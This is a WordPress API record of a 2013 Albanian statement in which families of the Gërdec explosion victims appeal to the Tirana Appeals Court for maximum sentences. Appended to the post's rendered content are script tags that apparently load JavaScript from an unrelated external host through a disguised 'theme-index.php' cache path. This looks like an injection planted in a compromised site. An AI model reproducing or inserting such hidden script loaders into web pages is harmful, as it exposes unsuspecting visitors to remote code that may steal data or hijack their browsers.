{"id":360,"date":"2013-02-25T21:23:20","date_gmt":"2013-02-25T21:23:20","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=360"},"modified":"2014-10-07T10:44:00","modified_gmt":"2014-10-07T08:44:00","slug":"deklarate-e-familjareve-te-gerdecit","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=360","title":{"rendered":"Deklarat\u00eb e familjar\u00ebve t\u00eb G\u00ebrdecit"},"content":{"rendered":"<p>Pas gati 5 vitesh, ne familjar\u00ebt e viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit i drejtohemi p\u00ebrs\u00ebri me nj\u00eb apel drejt\u00ebsis\u00eb shqiptare. N\u00eb dat\u00ebn 4 shkurt 2013 gjykata e Apelit ka mund\u00ebsi t\u00eb riparoj\u00eb traum\u00ebn q\u00eb shkaktoi vendimi i zhg\u00ebnjyes i shkall\u00ebs s\u00eb par\u00eb. Sa p\u00ebr histori ju kujtojm\u00eb se me vendimin n\u00eb fjal\u00eb ra akuza e vrasjes n\u00eb rrethana t\u00eb cil\u00ebsuara. K\u00ebshtu, sipas gjykat\u00ebs s\u00eb shkall\u00ebs s\u00eb par\u00eb nuk pati vrasje si\u00e7 pretendonte prokuroria. Sigurisht q\u00eb kjo nuk mohon faktin q\u00eb n\u00eb G\u00ebrdec humb\u00ebn jet\u00ebn 26 persona. Thjesht k\u00ebto humbje jete u riklasifikuan si pasoja an\u00ebsore t\u00eb shkeljes s\u00eb rregullave t\u00eb mbrojtjes n\u00eb pun\u00eb.<\/p>\n<p>Diferenca kryesore mes klasifikimit t\u00eb b\u00ebr\u00eb nga gjykata n\u00eb krahasim me at\u00eb q\u00eb pretendoi prokuroria ndikoi tek masa e d\u00ebnimit. Gjykata gjeti nj\u00eb nen m\u00eb t\u00eb but\u00eb duke hedhur iden\u00eb se burgimi i p\u00ebrjetsh\u00ebm b\u00ebhet i pap\u00ebrshtatsh\u00ebm. Pavar\u00ebsisht k\u00ebsaj, neni 289 i Kodit Penal n\u00eb paragrafin e dyt\u00eb parashikon nj\u00eb d\u00ebnim jo m\u00eb pak se pes\u00eb vjet. Kjo do t\u00eb thot\u00eb q\u00eb gjykata teorikisht n\u00eb aplikim t\u00eb k\u00ebtij neni mundet edhe t\u00eb mb\u00ebrrinte t\u00eb jepte nj\u00eb d\u00ebnim me burgim t\u00eb p\u00ebrjetsh\u00ebm. K\u00ebt\u00eb mund ta mb\u00ebshteste edhe n\u00eb nenin 31 t\u00eb Kodit Penal, i cili lejon dh\u00ebnien e burgimit t\u00eb p\u00ebrjetsh\u00ebm n\u00eb rastet e nj\u00eb krimi t\u00eb r\u00ebnd\u00eb. Gjykat\u00ebs n\u00eb rastin konkret krimi i G\u00ebrdecit iu duk i nivelit mesatar, as i leht\u00eb e as i r\u00ebnd\u00eb. Kjo \u00ebsht\u00eb dhe pjesa q\u00eb gjykat\u00ebsit zakonisht tentojn\u00eb t\u00eb justifikojn\u00eb m\u00eb pak n\u00eb dh\u00ebnien e vendimit, por, me apo pa justifikimin e gjyqtar\u00ebve, mund t\u00eb themi me plot goj\u00eb se vendimi ishte nj\u00eb p\u00ebrk\u00ebdhelje p\u00ebr t\u00eb akuzuarit. Miklimi i zem\u00ebrat\u00ebs s\u00eb familjar\u00ebve t\u00eb viktimave me 18 vitet impresionuese t\u00eb d\u00ebnimit p\u00ebr dy t\u00eb pandehur ishte nj\u00eb tentativ\u00eb e d\u00ebshtuar. Shifrat 18 apo 10 ishin dhe jan\u00eb aspak proporcionale me dhimbjen e humbjes t\u00eb t\u00eb dashurve tan\u00eb.<\/p>\n<p>Kemi 5 vjet q\u00eb gjendemi p\u00ebrpara faktit gati t\u00eb kryer. Nd\u00ebrkoh\u00eb jet\u00eb t\u00eb tjera kan\u00eb humbur p\u00ebr shkak t\u00eb dhimbjes s\u00eb krijuar. Ju kujtojm\u00eb tragjedin\u00eb e familjes Osmani, ku s\u00eb fundmi vrau veten dhe Tushja e cila la pas nj\u00eb mbes\u00eb vet\u00ebm 5 vje\u00e7. Aq sa vitet q\u00eb ne presim p\u00ebr drejt\u00ebsi.<\/p>\n<p>Ju kujtojm\u00eb se jo vet\u00ebm kronika e vdekjeve n\u00eb G\u00ebrdec ka q\u00ebn\u00eb e paralajm\u00ebruar, por dhe leht\u00ebsia e d\u00ebnimeve t\u00eb fajtor\u00ebve duket se \u00ebsht\u00eb e paralajm\u00ebruar. Jet\u00ebt tona ishin t\u00eb pavlera n\u00ebse shihen kushtet e sigurimit t\u00eb sh\u00ebndetit e t\u00eb jet\u00ebs q\u00eb nuk respektoheshin, por dhe drejt\u00ebsia p\u00ebr humbjen e tyre nuk duket se ka patur fat m\u00eb t\u00eb mir\u00eb.<\/p>\n<p>N\u00ebse k\u00ebto ngjarje do t\u00eb kishin ndodhur n\u00eb SHBA, ku dhe u d\u00ebnua Efraim Diveroli thjesht p\u00ebr mos respektim t\u00eb rregullave t\u00eb detyrueshme t\u00eb nj\u00eb shteti tjet\u00ebr, d\u00ebnimi do t\u00eb ishte maksimal. \u00a0Sistemi atje njeh mund\u00ebsin\u00eb e vler\u00ebsimit t\u00eb dhimbjes nga nj\u00eb trup gjykues popullor. K\u00ebtu ky sistem nuk ekziston, por \u00ebsht\u00eb e qart\u00eb nga ana tjet\u00ebr se opinioni publik \u00ebsht\u00eb n\u00eb an\u00ebn ton\u00eb n\u00eb k\u00ebt\u00eb luft\u00eb me t\u00eb drejt\u00ebn. P\u00ebr nj\u00eb gjykat\u00eb popullore d\u00ebnimi do t\u00eb ishte maksimal. Gjykata e Apelit duhet ta marr\u00eb n\u00eb konsiderat\u00eb ndjeshm\u00ebrin\u00eb sociale lidhur me k\u00ebt\u00eb tragjedi, q\u00eb p\u00ebrb\u00ebn dhe nj\u00eb nga funksionet e drejt\u00ebsiv\u00ebnies e t\u00eb respektimit t\u00eb ligjit.<\/p>\n<p>Ne familjar\u00ebt e viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit i k\u00ebrkojm\u00eb gjykat\u00ebs s\u00eb Apelit n\u00eb Tiran\u00eb t\u00eb respektoj\u00eb ligjin dhe t\u00eb jet\u00eb e drejt\u00eb me ne, viktimat e v\u00ebrteta t\u00eb k\u00ebsaj tragjedie.<\/p>\n<p>Ne familjar\u00ebt e viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit i k\u00ebrkojm\u00eb Gjykat\u00ebs t\u00eb d\u00ebnoj\u00eb m\u00eb maksimumin e d\u00ebnimit fajtor\u00ebt e k\u00ebsaj tragjedie q\u00eb ndryshoi p\u00ebr keq nj\u00ebher\u00eb e p\u00ebrgjithmon\u00eb jet\u00ebt tona.<\/p>\n<div id=\"jp-post-flair\"><\/div>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pas gati 5 vitesh, ne familjar\u00ebt e viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit i drejtohemi p\u00ebrs\u00ebri me nj\u00eb apel drejt\u00ebsis\u00eb shqiptare. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":361,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/360"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=360"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/360\/revisions"}],"predecessor-version":[{"id":362,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/360\/revisions\/362"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/361"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=360"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=360"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=360"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}